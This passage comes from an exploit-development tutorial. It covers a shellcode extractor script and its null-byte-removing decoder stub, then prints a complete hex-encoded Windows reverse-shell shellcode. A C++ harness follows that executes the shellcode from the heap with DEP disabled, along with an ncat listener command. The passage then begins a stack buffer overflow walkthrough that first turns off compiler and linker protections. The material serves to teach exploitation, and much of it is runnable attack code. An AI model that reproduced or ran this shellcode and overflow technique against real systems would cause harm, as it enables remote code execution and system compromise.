 
0xFF
,
                       
#   CALL $ + 4
 
                                                        
# here:
 
    
0xC0
,
                                               
#   (FF)C0 = INC EAX
 
 
0x5F
,
                                               
#   POP EDI
 
    
0xB9
,
 
xor1
[
0
],
 
xor1
[
1
],
 
xor1
[
2
],
 
xor1
[
3
],
           
#   MOV ECX, <xor value 1 for shellcode len>
 
    
0x81
,
 
0xF1
,
 
xor2
[
0
],
 
xor2
[
1
],
 
xor2
[
2
],
 
xor2
[
3
],
     
#   XOR ECX, <xor value 2 for sh
ellcode len>
 
    
0x8D
,
 
0x5F
,
 
-
(
len
(
bytes_blocks
)
 
+
 
5
)
 
&
 
0xFF
,
        
#   LEA EBX, [EDI + (bytes 
-
 here)]
 
    
0x83
,
 
0xC7
,
 
0x30
,
                                   
#   ADD EDI, shellcode_begin 
-
 here
 
                                                        
# l
oop1:
 
    
0xB0
,
 
0xFE
,
                                         
#   MOV AL, 0FEh
 
    
0xF6
,
 
0x63
,
 
0x01
,
                                   
#   MUL AL, BYTE PTR [EBX+1]
 
    
0x0F
,
 
0xB7
,
 
0xD0
,
                                   
#   MOVZX EDX, AX
 
    
0x33
,
 
0xF6
,
   
                                      
#   XOR ESI, ESI
 
    
0xFC
,
                                               
#   CLD
 
                                                        
# loop2:
 
    
0x8A
,
 
0x07
,
                                         
#   MOV AL, BYTE
 PTR [EDI]
 
    
0x3A
,
 
0x03
,
                                         
#   CMP AL, BYTE PTR [EBX]
 
    
0x0F
,
 
0x44
,
 
0xC6
,
                                   
#   CMOVE EAX, ESI
 
    
0xAA
,
                                               
#   STOSB
 
    
0x49
,
            
                                   
#   DEC ECX
 
    
0x74
,
 
0x07
,
                                         
#   JE shellcode_begin
 
    
0x4A
,
                                               
#   DEC EDX
 
    
0x75
,
 
0xF2
,
                                         
#   JN
E loop2
 
    
0x43
,
                                               
#   INC EBX
 
    
0x43
,
                                               
#   INC EBX
 
    
0xEB
,
 
0xE3
                                          
#   JMP loop1
 
                                          
# shellcode_begin:
 
])
 
 
bytes_blocks
 is the array
 
[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]
 
we talked about before, but without pairs.
 
Note that the code starts with a 
JMP SHORT
 which skips 
bytes_blocks
. For this to work 
le
n(bytes_blocks)
 
must be less than or equal to 0x7F. But as you can see, 
len(bytes_blocks)
 appears in another instruction as 
well:
 
Python
 
 
0x8D
,
 
0x5F
,
 
-
(
len
(
bytes_blocks
)
 
+
 
5
)
 
&
 
0xFF
,
        
#   LEA EBX, [EDI + (bytes 
-
 here)]
 
 
This requires that 
len(bytes_
blocks)
 is less than or equal to 
0x7F 
–
 5
, so this is the final condition. This is 
what happens if the condition is violated:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 84 
-
 
Python
 
 
if
 
len
(
bytes_blocks
)
 
>
 
0x7f
 
-
 
5
:
 
        
# Can't assemble "LEA EBX, [EDI + (bytes
-
here)]" or "JMP skip_bytes".
 
       
return
 
None
 
 
Let’s review the code in more detail:
 
Assembly (x86)
 
 
JMP
 
SHORT
 
skip_bytes
 
bytes
:
 
  
...
 
skip_bytes
:
 
  
CALL
 
$
 
+
 
4
                                  
; PUSH "here"; JMP "here"
-
1
 
here
:
 
  
(
FF
)
C0
 
=
 
INC
 
EAX
                            
; not importan
t: just a NOP
 
  
POP
 
EDI
                                     
; EDI = absolute address of "here"
 
  
MOV
 
ECX
,
 
<
xor
 
value
 
1
 
for
 
shellcode
 
len
>
 
  
XOR
 
ECX
,
 
<
xor
 
value
 
2
 
for
 
shellcode
 
len
>
    
; ECX = shellcode length
 
  
LEA
 
EBX
,
 
[
EDI
 
+
 
(
bytes
 
-
 
here
)]
             
;
 EBX = absolute address of "bytes"
 
  
ADD
 
EDI
,
 
shellcode_begin
 
-
 
here
             
; EDI = absolute address of the shellcode
 
loop1
:
 
  
MOV
 
AL
,
 
0FEh
                                
; AL = 254
 
  
MUL
 
AL
,
 
BYTE
 
PTR
 
[
EBX
+
1
]
                    
; AX = 254 * current nu
m_blocksX = num bytes
 
  
MOVZX
 
EDX
,
 
AX
                               
; EDX = num bytes of the current chunk
 
  
XOR
 
ESI
,
 
ESI
                                
; ESI = 0
 
  
CLD
                                         
; tells STOSB to go forwards
 
loop2
:
 
  
MOV
 
AL
,
 
B
YTE
 
PTR
 
[
EDI
]
                      
; AL = current byte of shellcode
 
  
CMP
 
AL
,
 
BYTE
 
PTR
 
[
EBX
]
                      
; is AL the missing byte for the current chunk?
 
  
CMOVE
 
EAX
,
 
ESI
                              
; if it is, then EAX = 0
 
  
STOSB
                
                       
; replaces the current byte of the shellcode with AL
 
  
DEC
 
ECX
                                     
; ECX 
-
= 1
 
  
JE
 
shellcode_begin
                          
; if ECX == 0, then we're done!
 
  
DEC
 
EDX
                                    
 
; EDX 
-
= 1
 
  
JNE
 
loop2
                                   
; if EDX != 0, then we keep working on the current chunk
 
  
INC
 
EBX
                                     
; EBX += 1  (moves to next pair...
 
  
INC
 
EBX
                                     
; EBX += 1   .
.. missing_bytes, num_blocks)
 
  
JMP
 
loop1
                                   
; starts working on the next chunk
 
shellcode_begin
:
 
 
Testing the script
 
This is the easy part! If we run the script without any arguments it says:
 
Shellcode Extractor by Massimilia
no Tomassoli (2015)
 
 
Usage:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 85 
-
 
  sce.py <exe file> <map file>
 
If you remember, we told the linker of VS 2013 to also produce a map file. Just call the script with the path to 
the exe file and the path to the map file. Here’s what we get for our reverse shell
:
 
Shellcode Extractor by Massimiliano Tomassoli (2015)
 
 
Extracting shellcode length from "mapfile"...
 
shellcode length: 614
 
Extracting shellcode from "shellcode.exe" and analyzing relocations...
 
Found 3 reference(s) to 3 string(s) in .rdata
 
Strings:
 
  ws2_
32.dll
 
  cmd.exe
 
  127.0.0.1
 
 
Fixing the shellcode...
 
final shellcode length: 715
 
 
char shellcode[] =
 
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
xa8
\
x03
\
x01
\
x01
\
x81
\
xf1
\
x01
\
x01"
 
"
\
x01
\
x01
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x05
\
x0f
\
x44
\
xc6
\
xaa"
 
"
\
xe2
\
xf6
\
xe8
\
x05
\
x0
5
\
x05
\
x05
\
x5e
\
x8b
\
xfe
\
x81
\
xc6
\
x7b
\
x02
\
x05
\
x05"
 
"
\
xb9
\
x03
\
x05
\
x05
\
x05
\
xfc
\
xad
\
x01
\
x3c
\
x07
\
xe2
\
xfa
\
x55
\
x8b
\
xec
\
x83"
 
"
\
xe4
\
xf8
\
x81
\
xec
\
x24
\
x02
\
x05
\
x05
\
x53
\
x56
\
x57
\
xb9
\
x8d
\
x10
\
xb7
\
xf8"
 
"
\
xe8
\
xa5
\
x01
\
x05
\
x05
\
x68
\
x87
\
x02
\
x05
\
x05
\
xff
\
xd0
\
xb9
\
x40
\
xd5
\
xdc"
 
"
\
x2d
\
xe
8
\
x94
\
x01
\
x05
\
x05
\
xb9
\
x6f
\
xf1
\
xd4
\
x9f
\
x8b
\
xf0
\
xe8
\
x88
\
x01"
 
"
\
x05
\
x05
\
xb9
\
x82
\
xa1
\
x0d
\
xa5
\
x8b
\
xf8
\
xe8
\
x7c
\
x01
\
x05
\
x05
\
xb9
\
x70"
 
"
\
xbe
\
x1c
\
x23
\
x89
\
x44
\
x24
\
x18
\
xe8
\
x6e
\
x01
\
x05
\
x05
\
xb9
\
xd1
\
xfe
\
x73"
 
"
\
x1b
\
x89
\
x44
\
x24
\
x0c
\
xe8
\
x60
\
x01
\
x05
\
x05
\
xb9
\
xe2
\
xfa
\
x1b
\
x01
\
x
e8"
 
"
\
x56
\
x01
\
x05
\
x05
\
xb9
\
xc9
\
x53
\
x29
\
xdc
\
x89
\
x44
\
x24
\
x20
\
xe8
\
x48
\
x01"
 
"
\
x05
\
x05
\
xb9
\
x6e
\
x85
\
x1c
\
x5c
\
x89
\
x44
\
x24
\
x1c
\
xe8
\
x3a
\
x01
\
x05
\
x05"
 
"
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x89
\
x44
\
x24
\
x24
\
xe8
\
x2c
\
x01
\
x05
\
x05
\
xb9
\
x98"
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 86 
-
 
"
\
x94
\
x8e
\
xca
\
x8b
\
xd8
\
xe8
\
x20
\
x01
\
x05
\
x05
\
x89
\
x44
\
x
24
\
x10
\
x8d
\
x84"
 
"
\
x24
\
xa0
\
x05
\
x05
\
x05
\
x50
\
x68
\
x02
\
x02
\
x05
\
x05
\
xff
\
xd6
\
x33
\
xc9
\
x85"
 
"
\
xc0
\
x0f
\
x85
\
xd8
\
x05
\
x05
\
x05
\
x51
\
x51
\
x51
\
x6a
\
x06
\
x6a
\
x01
\
x6a
\
x02"
 
"
\
x58
\
x50
\
xff
\
xd7
\
x8b
\
xf0
\
x33
\
xff
\
x83
\
xfe
\
xff
\
x0f
\
x84
\
xc0
\
x05
\
x05"
 
"
\
x05
\
x8d
\
x44
\
x24
\
x14
\
x50
\
x57
\
x57
\
x68
\
x
9a
\
x02
\
x05
\
x05
\
xff
\
x54
\
x24"
 
"
\
x2c
\
x85
\
xc0
\
x0f
\
x85
\
xa8
\
x05
\
x05
\
x05
\
x6a
\
x02
\
x57
\
x57
\
x6a
\
x10
\
x8d"
 
"
\
x44
\
x24
\
x58
\
x50
\
x8b
\
x44
\
x24
\
x28
\
xff
\
x70
\
x10
\
xff
\
x70
\
x18
\
xff
\
x54"
 
"
\
x24
\
x40
\
x6a
\
x02
\
x58
\
x66
\
x89
\
x44
\
x24
\
x28
\
xb8
\
x05
\
x7b
\
x05
\
x05
\
x66"
 
"
\
x89
\
x44
\
x24
\
x2a
\
x8d
\
x44
\
x
24
\
x48
\
x50
\
xff
\
x54
\
x24
\
x24
\
x57
\
x57
\
x57"
 
"
\
x57
\
x89
\
x44
\
x24
\
x3c
\
x8d
\
x44
\
x24
\
x38
\
x6a
\
x10
\
x50
\
x56
\
xff
\
x54
\
x24"
 
"
\
x34
\
x85
\
xc0
\
x75
\
x5c
\
x6a
\
x44
\
x5f
\
x8b
\
xcf
\
x8d
\
x44
\
x24
\
x58
\
x33
\
xd2"
 
"
\
x88
\
x10
\
x40
\
x49
\
x75
\
xfa
\
x8d
\
x44
\
x24
\
x38
\
x89
\
x7c
\
x24
\
x58
\
x50
\
x8d"
 
"
\
x44
\
x24
\
x5c
\
x
c7
\
x84
\
x24
\
x88
\
x05
\
x05
\
x05
\
x05
\
x01
\
x05
\
x05
\
x50
\
x52"
 
"
\
x52
\
x52
\
x6a
\
x01
\
x52
\
x52
\
x68
\
x92
\
x02
\
x05
\
x05
\
x52
\
x89
\
xb4
\
x24
\
xc0"
 
"
\
x05
\
x05
\
x05
\
x89
\
xb4
\
x24
\
xbc
\
x05
\
x05
\
x05
\
x89
\
xb4
\
x24
\
xb8
\
x05
\
x05"
 
"
\
x05
\
xff
\
x54
\
x24
\
x34
\
x6a
\
xff
\
xff
\
x74
\
x24
\
x3c
\
xff
\
x54
\
x24
\
x18
\
x33"
 
"
\
x
ff
\
x57
\
xff
\
xd3
\
x5f
\
x5e
\
x33
\
xc0
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb"
 
"
\
x10
\
xc1
\
xca
\
x0d
\
x3c
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0"
 
"
\
x41
\
x8a
\
x01
\
x84
\
xc0
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14"
 
"
\
x53
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x05
\
x05
\
x05
\
x89
\
x45
\
xfc
\
x8b"
 
"
\
x45
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8d
\
x47
\
xf8"
 
"
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b
\
x5c
\
x30
\
x78"
 
"
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x9e
\
xff
\
xff
\
xff
\
x8b"
 
"
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0
\
x89
\
x45
\
xfc"
 
"
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x7d
\
xff
\
xff
\
xff"
 
"
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d
\
xf0
\
x40
\
x89"
 
"
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
xa0
\
x33
\
xc0
\
x5f"
 
"
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24
\
x8d
\
x04
\
x48"
 
"
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04
\
x30
\
x03
\
xc6"
 
"
\
xeb
\
xdd
\
x2f
\
x05
\
x05
\
x05
\
xf2
\
x05
\
x05
\
x05
\
x80
\
x01
\
x05
\
x05
\
x77
\
x73"
 
"
\
x32
\
x5f
\
x33
\
x32
\
x2e
\
x64
\
x6c
\
x6c
\
x05
\
x63
\
x6d
\
x64
\
x2e
\
x65
\
x78
\
x65"
 
"
\
x05
\
x31
\
x32
\
x37
\
x2e
\
x30
\
x2e
\
x30
\
x2e
\
x31
\
x05";
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 87 
-
 
The part about relocations is very important, because you can check if everything is OK. For example, we 
know that our reverse shell uses 3 strings and they were all correctly extracted from the .rdata section. We 
can see that the
 original shellcode was 614 bytes and the resulting shellcode (after handling relocations and 
null bytes) is 715 bytes.
 
Now we need to run the resulting shellcode in some way. The script gives us the shellcode in C/C++ format, 
so we just need to copy and p
aste it in a small C/C++ file. Here’s the complete source code:
 
C++
 
 
#include <cstring>
 
#include <cassert>
 
 
// Important: Disable DEP!
 
//  (Linker
-
>Advanced
-
>Data Execution Prevention = NO)
 
 
void
 
main
()
 
{
 
    
char
 
shellcode
[]
 
=
 
        
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
xa8
\
x03
\
x01
\
x01
\
x81
\
xf1
\
x01
\
x01"
 
        
"
\
x01
\
x01
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x05
\
x0f
\
x44
\
xc6
\
xaa"
 
        
"
\
xe2
\
xf6
\
xe8
\
x05
\
x05
\
x05
\
x05
\
x5e
\
x8b
\
xfe
\
x81
\
xc6
\
x7b
\
x02
\
x05
\
x05"
 
        
"
\
xb9
\
x03
\
x05
\
x05
\
x05
\
xfc
\
xad
\
x01
\
x3c
\
x07
\
xe2
\
xfa
\
x55
\
x8b
\
xec
\
x83"
 
        
"
\
xe4
\
xf8
\
x81
\
xec
\
x24
\
x02
\
x05
\
x05
\
x53
\
x56
\
x57
\
xb9
\
x8d
\
x10
\
xb7
\
xf8"
 
        
"
\
xe8
\
xa5
\
x01
\
x05
\
x05
\
x68
\
x87
\
x02
\
x05
\
x05
\
xff
\
xd0
\
xb9
\
x40
\
xd5
\
xdc"
 
        
"
\
x2d
\
xe8
\
x94
\
x01
\
x05
\
x05
\
xb9
\
x6f
\
xf1
\
xd4
\
x9f
\
x8b
\
xf0
\
xe8
\
x88
\
x01"
 
        
"
\
x05
\
x05
\
xb9
\
x82
\
xa1
\
x0d
\
xa5
\
x8b
\
xf8
\
xe8
\
x7c
\
x01
\
x05
\
x05
\
xb9
\
x70"
 
        
"
\
xbe
\
x1c
\
x23
\
x89
\
x44
\
x24
\
x18
\
xe8
\
x6e
\
x01
\
x05
\
x05
\
xb9
\
xd1
\
xfe
\
x73"
 
        
"
\
x1b
\
x89
\
x44
\
x24
\
x0c
\
xe8
\
x60
\
x01
\
x05
\
x05
\
xb9
\
xe2
\
xfa
\
x1b
\
x01
\
xe8"
 
        
"
\
x56
\
x01
\
x05
\
x05
\
xb9
\
xc9
\
x53
\
x29
\
xd
c
\
x89
\
x44
\
x24
\
x20
\
xe8
\
x48
\
x01"
 
        
"
\
x05
\
x05
\
xb9
\
x6e
\
x85
\
x1c
\
x5c
\
x89
\
x44
\
x24
\
x1c
\
xe8
\
x3a
\
x01
\
x05
\
x05"
 
        
"
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x89
\
x44
\
x24
\
x24
\
xe8
\
x2c
\
x01
\
x05
\
x05
\
xb9
\
x98"
 
        
"
\
x94
\
x8e
\
xca
\
x8b
\
xd8
\
xe8
\
x20
\
x01
\
x05
\
x05
\
x89
\
x44
\
x24
\
x10
\
x8d
\
x84"
 
        
"
\
x24
\
xa0
\
x05
\
x05
\
x05
\
x50
\
x68
\
x02
\
x02
\
x05
\
x05
\
xff
\
xd6
\
x33
\
xc9
\
x85"
 
        
"
\
xc0
\
x0f
\
x85
\
xd8
\
x05
\
x05
\
x05
\
x51
\
x51
\
x51
\
x6a
\
x06
\
x6a
\
x01
\
x6a
\
x02"
 
        
"
\
x58
\
x50
\
xff
\
xd7
\
x8b
\
xf0
\
x33
\
xff
\
x83
\
xfe
\
xff
\
x0f
\
x84
\
xc0
\
x05
\
x05"
 
        
"
\
x05
\
x8d
\
x44
\
x24
\
x14
\
x
50
\
x57
\
x57
\
x68
\
x9a
\
x02
\
x05
\
x05
\
xff
\
x54
\
x24"
 
        
"
\
x2c
\
x85
\
xc0
\
x0f
\
x85
\
xa8
\
x05
\
x05
\
x05
\
x6a
\
x02
\
x57
\
x57
\
x6a
\
x10
\
x8d"
 
        
"
\
x44
\
x24
\
x58
\
x50
\
x8b
\
x44
\
x24
\
x28
\
xff
\
x70
\
x10
\
xff
\
x70
\
x18
\
xff
\
x54"
 
        
"
\
x24
\
x40
\
x6a
\
x02
\
x58
\
x66
\
x89
\
x44
\
x24
\
x28
\
xb8
\
x05
\
x7b
\
x05
\
x05
\
x66"
 
        
"
\
x89
\
x44
\
x24
\
x2a
\
x8d
\
x44
\
x24
\
x48
\
x50
\
xff
\
x54
\
x24
\
x24
\
x57
\
x57
\
x57"
 
        
"
\
x57
\
x89
\
x44
\
x24
\
x3c
\
x8d
\
x44
\
x24
\
x38
\
x6a
\
x10
\
x50
\
x56
\
xff
\
x54
\
x24"
 
        
"
\
x34
\
x85
\
xc0
\
x75
\
x5c
\
x6a
\
x44
\
x5f
\
x8b
\
xcf
\
x8d
\
x44
\
x24
\
x58
\
x33
\
xd2"
 
        
"
\
x88
\
x10
\
x40
\
x49
\
x75
\
xfa
\
x8d
\
x44
\
x24
\
x38
\
x89
\
x7c
\
x24
\
x58
\
x50
\
x8d"
 
        
"
\
x44
\
x24
\
x5c
\
xc7
\
x84
\
x24
\
x88
\
x05
\
x05
\
x05
\
x05
\
x01
\
x05
\
x05
\
x50
\
x52"
 
        
"
\
x52
\
x52
\
x6a
\
x01
\
x52
\
x52
\
x68
\
x92
\
x02
\
x05
\
x05
\
x52
\
x89
\
xb4
\
x24
\
xc0"
 
        
"
\
x05
\
x05
\
x05
\
x89
\
xb4
\
x24
\
xbc
\
x05
\
x05
\
x05
\
x89
\
xb4
\
x24
\
xb8
\
x05
\
x05"
 
        
"
\
x05
\
xff
\
x54
\
x24
\
x34
\
x6a
\
xff
\
xff
\
x74
\
x24
\
x3c
\
xff
\
x54
\
x24
\
x18
\
x33"
 
        
"
\
xff
\
x57
\
xff
\
xd3
\
x5f
\
x5e
\
x33
\
xc0
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb"
 
        
"
\
x10
\
xc1
\
xca
\
x0d
\
x3c
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0"
 
     
"
\
x41
\
x8a
\
x01
\
x84
\
xc0
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14"
 
        
"
\
x53
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x05
\
x05
\
x05
\
x89
\
x45
\
xfc
\
x8b"
 
        
"
\
x45
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8d
\
x47
\
xf8"
 
        
"
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf
6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b
\
x5c
\
x30
\
x78"
 
        
"
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x9e
\
xff
\
xff
\
xff
\
x8b"
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 88 
-
 
        
"
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0
\
x89
\
x45
\
xfc"
 
        
"
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x7d
\
xff
\
x
ff
\
xff"
 
        
"
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d
\
xf0
\
x40
\
x89"
 
        
"
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
xa0
\
x33
\
xc0
\
x5f"
 
        
"
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24
\
x8d
\
x04
\
x48"
 
        
"
\
x0f
\
xb7
\
x0c
\
x
30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04
\
x30
\
x03
\
xc6"
 
        
"
\
xeb
\
xdd
\
x2f
\
x05
\
x05
\
x05
\
xf2
\
x05
\
x05
\
x05
\
x80
\
x01
\
x05
\
x05
\
x77
\
x73"
 
        
"
\
x32
\
x5f
\
x33
\
x32
\
x2e
\
x64
\
x6c
\
x6c
\
x05
\
x63
\
x6d
\
x64
\
x2e
\
x65
\
x78
\
x65"
 
        
"
\
x05
\
x31
\
x32
\
x37
\
x2e
\
x30
\
x2e
\
x30
\
x2e
\
x31
\
x05"
;
 
 
static_assert
(
sizeof
(
shellcode
)
 
>
 
4
,
 
"Use 'char shellcode[] = ...' (not 'char *shellcode = ...')"
);
 
 
// We copy the shellcode to the heap so that it's in writeable memory and can modify itself.
 
    
char
 
*
ptr
 
=
 
new
 
char
[
sizeof
(
shellcode
)];
 
    
memcpy
(
ptr
,
 
shellcode
,
 
sizeof
(
shellcode
));
 
    
((
void
(*)())
ptr
)();
 
}
 
 
To make this code work, you need to disable 
DEP
 (
D
ata 
E
xecution 
P
revention) by going to 
Project
→
<solution name> Properties
 and then, under 
Configuration Properties
, 
Linker
 and 
Advanced
, set 
Data Execution Prevention (DEP)
 to 
No (/NXCOMPAT:NO)
. This is needed because our shellcode will be 
executed from the heap which wouldn’t be executable with DEP a
ctivated.
 
static_assert
 was introduced with C++11 (so VS 2013 CTP is required) and here is used to check that you 
use
 
C++
 
 
char
 
shellcode
[]
 
=
 
"..."
 
 
instead of
 
C++
 
 
char
 
*
shellcode
 
=
 
"..."
 
 
In the first case, 
sizeof(shellcode)
 is the effective length of th
e shellcode and the shellcode is copied onto 
the stack. In the second case, 
sizeof(shellcode)
 is just the size of the pointer (i.e. 4) and the pointer points to 
the shellcode in the 
.rdata
 section.
 
To test the shellcode, just open a cmd shell and enter
 
nca
t 
-
lvp 123
 
Then, run the shellcode and see if it works.
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 89 
-
 
Exploitme1 (“ret eip” overwrite)
 
 
Here’s a simple 
C/C++
 program which has an obvious vulnerability:
 
C++
 
 
#include <cstdio>
 
 
int
 
main
()
 
{
 
    
char
 
name
[
32
];
 
    
printf
(
"Enter your name and press ENTER
\
n"
);
 
    
scanf
(
"%s"
,
 
name
);
 
    
printf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
return
 
0
;
 
}
 
 
The problem is that 
scanf()
 may keep writing beyond the end of the array 
name
. To verify the vulnerability, 
run the program and enter a very long name such as
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
The program should print
 
Hi, aaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa!
 
and then crash.
 
The interesting thing is that by entering a particular name, we can make the program execute 
arbitrary code
.
 
First of all, in 
VS 2013
, we’ll disable 
DEP
 and 
stack cookies
, by going to 
Project
→
properties
, and modifying 
the configuration for 
Release
 as follows:
 

 
Configuration Properties
 
o
 
C/C++
 

 
Code Generation
 

 
Security Check: Disable Security Check (/GS
-
)
 

 
Linker
 
o
 
Advanced
 

 
Data Execution Prevention (DEP): No (/NXCOMPAT:NO)
 
This is our 
main()
 function
 in assembly:
 
int main() {
 
01391000 55                   push        ebp  
 
01391001 8B EC                mov         ebp,esp  
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 90 
-
 
01391003 83 EC 20             sub         esp,20h  
 
    char name[32];
 
    
printf("Enter your name and press ENTER
\
n");
 
01391006 
68 00 21 39 01       push        1392100h  
 
0139100B FF 15 8C 20 39 01    call        dword ptr ds:[139208Ch]  
 
    scanf("%s", name);
 
01391011 8D 45 E0             lea         eax,[name]  
 
01391014 50                   push        eax  
 
01391015 68 24 21 
39 01       push        1392124h  
 
0139101A FF 15 94 20 39 01    call        dword ptr ds:[1392094h]  
 
    printf("Hi, %s!
\
n", name);
 
01391020 8D 45 E0             lea         eax,[name]  
 
01391023 50                   push        eax  
 
01391024 68 28 21 3
9 01       push        1392128h  
 
01391029 FF 15 8C 20 39 01    call        dword ptr ds:[139208Ch]  
 
0139102F 83 C4 14             add         esp,14h  
 
    return 0;
 
01391032 33 C0                xor         eax,eax  
 
}
 
01391034 8B E5                mov 
        esp,ebp  
 
01391036 5D                   pop         ebp  
 
01391037 C3                   ret
 
Here’s the assembly code which calls 
main()
:
 
            
mainret = main(argc, argv, envp);
 
00261222 FF 35 34 30 26 00    push        dword ptr ds:[263034h] 
 
 
00261228 FF 35 30 30 26 00    push        dword ptr ds:[263030h]  
 
0026122E FF 35 2C 30 26 00    push        dword ptr ds:[26302Ch]  
 
00261234 E8 C7 FD FF FF       call        main (0261000h)  
 
00261239 83 C4 0C             add         esp,0Ch
 
As you sho
uld know, the 
stack
 grows towards lower addresses. The stack is like this after the three pushes 
above:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 91 
-
 
  esp 
--
>  argc         ; third push
 
           argv         ; second push
 
           envp         ; first push
 
The 
call
 instruction pushes 0x261239 ont
o the stack so that the 
ret
 instruction can return to the code 
following the 
call
 instruction. Just after the call, at the beginning of the 
main()
 function, the stack is like this:
 
  esp 
--
>  ret eip      ; 0x261239
 
           argc         ; third push
 
   
        argv         ; second push
 
           envp         ; first push
 
The 
main()
 function starts with
 
01391000 55                   push        ebp  
 
01391001 8B EC                mov         ebp,esp  
 
01391003 83 EC 20             sub         esp,20h  
 
After these three instructions, the stack looks like this:
 
  esp 
--
>  name[0..3]   ; first 4 bytes of "name"
 
           name[4..7]
 
           .
 
           .
 
           .
 
           name[28..31] ; last 4 bytes of "name"
 
  ebp 
--
>  saved ebp
 
           ret e
ip      ; 0x261239
 
           argc         ; third push
 
           argv         ; second push
 
           envp         ; first push
 
Now, 
scanf()
 reads data from the standard input and writes it into 
name
. If the data is longer than 32 bytes, 
ret eip
 will be
 overwritten.
 
Let’s look at the last 3 instructions of 
main()
:
 
  
01391034 8B E5                mov         esp,ebp  
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 92 
-
 
  01391036 5D                   pop         ebp  
 
  
01391037 C3                   ret
 
After 
mov esp, ebp
, the stack looks like this:
 
esp,eb
p 
-
> saved ebp
 
           ret eip      ; 0x261239
 
           argc         ; third push
 
           argv         ; second push
 
           envp         ; first push
 
After 
pop ebp
 we have:
 
  esp 
--
>  ret eip      ; 0x261239
 
           argc         ; third push
 
           argv         ; second push
 
           envp         ; first push
 
Finally, 
ret
 pops 
ret eip
 from the top of the stack and jumps to that address. If we change 
ret eip
, we can 
redirect the flow of execution to wherever we want. As we’ve said, we ca
n overwrite 
ret eip
 by writing 
beyond the end of the array 
name
. This is possible because 
scanf()
 doesn’t check the length of the input.
 
By looking at the scheme above, you should convince yourself that 
ret eip
 is at the address 
name + 36
.
 
In VS 2013, star
t the debugger by pressing 
F5
 and enter a lot of 
a
s:
 
